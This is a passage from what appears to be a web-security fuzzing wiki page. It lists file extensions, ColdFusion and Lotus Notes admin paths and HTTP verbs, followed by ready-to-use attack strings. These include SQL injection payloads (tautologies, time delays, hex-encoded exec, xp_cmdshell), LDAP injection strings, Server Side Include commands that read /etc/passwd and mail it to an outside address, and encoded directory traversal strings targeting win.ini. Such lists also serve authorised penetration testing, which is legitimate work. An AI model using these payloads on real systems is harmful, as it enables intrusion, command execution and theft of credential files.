.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
